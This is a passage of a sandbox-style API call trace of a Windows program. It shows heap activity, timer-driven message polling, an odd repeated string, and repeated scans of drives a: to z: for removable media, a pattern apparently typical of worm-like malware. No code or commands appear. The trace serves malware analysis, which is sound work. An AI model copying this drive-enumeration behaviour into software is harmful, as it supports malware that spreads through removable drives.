| out: hHeap=0x12c0000) returned 1 [0217.814] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.814] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0217.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0217.815] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0217.815] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.815] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0217.815] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0217.815] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0217.815] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0217.815] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0217.815] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.815] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0217.816] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0217.816] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0217.816] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13260e0 [0217.816] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0217.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0217.816] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0217.816] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0217.816] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13260e0 | out: hHeap=0x12c0000) returned 1 [0217.816] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0217.816] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0217.816] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e4c0 [0217.816] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.816] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e4c0 | out: hHeap=0x12c0000) returned 1 [0217.816] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.816] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.816] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.816] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0217.816] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0217.816] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.816] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.816] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0217.816] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.817] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.817] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.817] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0217.817] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0217.817] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.817] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0217.817] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.817] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.817] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.817] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.817] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0217.817] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.817] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.817] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0217.817] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.817] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0217.817] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0217.817] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.817] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0217.817] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0217.817] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.817] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0217.817] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0217.817] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0217.817] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.818] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.818] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.818] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.818] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.818] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0217.818] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.818] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.819] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.819] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.819] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.819] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.819] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.819] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.820] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.820] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.820] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.820] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.820] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.821] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.821] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.821] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.821] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.950] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0217.951] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.951] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.952] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0217.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0217.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0217.952] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.952] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0217.952] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0217.952] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0217.952] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0217.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0217.952] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0217.953] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0217.953] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0217.953] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0217.953] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0217.955] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.955] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0217.956] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0217.956] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0217.956] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326100 [0217.956] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0217.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0217.956] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.956] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.956] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326100 | out: hHeap=0x12c0000) returned 1 [0217.956] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0217.956] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0217.956] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e400 [0217.956] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.957] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e400 | out: hHeap=0x12c0000) returned 1 [0217.957] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.957] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.957] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.957] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0217.957] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.957] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0217.957] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0217.957] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0217.957] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.957] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.957] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.957] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0217.957] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.957] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.958] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0217.958] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0217.958] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.958] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0217.958] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0217.960] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd208 [0217.960] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0217.960] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.960] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0217.960] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.960] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.960] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0217.960] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.961] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.961] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0217.961] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0217.961] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0217.961] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0217.961] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0217.961] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.961] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.961] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.961] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.962] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.962] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0217.962] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.962] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.962] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.963] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.963] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.963] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.964] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.964] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.964] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.964] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.964] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.965] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.965] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.966] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.966] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.966] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.966] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.967] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0217.967] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.967] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.967] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.968] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0217.968] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0217.968] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.968] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.968] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.968] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.968] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0217.968] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.968] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0217.968] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0217.968] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0217.968] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.968] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0217.968] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0217.968] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0217.968] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0217.969] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0217.969] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.969] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0217.969] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.969] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0217.969] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326020 [0217.969] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0217.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0217.969] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.969] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0217.969] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326020 | out: hHeap=0x12c0000) returned 1 [0217.969] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0217.969] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.969] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e000 [0217.969] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.970] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e000 | out: hHeap=0x12c0000) returned 1 [0217.970] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.970] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0217.970] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.970] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.970] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0217.970] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.970] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.970] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0217.970] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0217.970] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.970] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.970] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0217.970] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.970] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.970] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0217.970] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.970] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.970] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.970] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0217.970] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0217.971] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.971] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.971] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0217.971] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0217.971] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.971] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0217.971] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.971] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0217.971] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0217.971] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.971] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0217.971] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0217.971] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.971] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.971] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.971] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.972] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.972] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.972] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0217.972] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.973] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 